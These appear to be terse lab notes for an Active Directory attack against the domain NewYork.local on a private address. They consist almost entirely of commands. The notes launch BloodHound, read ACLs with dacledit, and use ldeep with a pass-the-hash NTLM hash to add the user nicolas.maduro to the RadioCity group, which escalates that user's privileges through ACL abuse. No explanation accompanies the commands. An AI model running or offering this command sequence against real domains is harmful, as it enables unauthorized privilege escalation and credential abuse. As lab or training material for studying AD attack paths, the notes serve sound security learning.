Let's Check in Bloodhound
sudo /usr/bin/./neo4j console
sudo /opt/tools/BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound --no-sandbox --disable-dev-shm-usag
Let's check with dacledit
dacledit.py -action 'read' -principal nicolas.maduro -target 'radiocity' 'NewYork.local'/'nicolas.maduro' -hashes 00000000000000000000000000000000:b3b3717f7d51b37fb325f7e7d048e998
ldeep ldap -u nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d newyork.local -s ldap://192.168.56.10 search '(sAMAccountName=Nicolas.Maduro)' distinguishedName
ldeep ldap -u nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d newyork.local -s ldap://192.168.56.10 search '(sAMAccountName=RadioCity)' distinguishedName
ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 add_to_group "CN=Nicolas.Maduro,OU=SugarHill,DC=NewYork,DC=local" "CN=RadioCity,OU=WestSide,DC=NewYork,DC=local"
ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'RadioCity'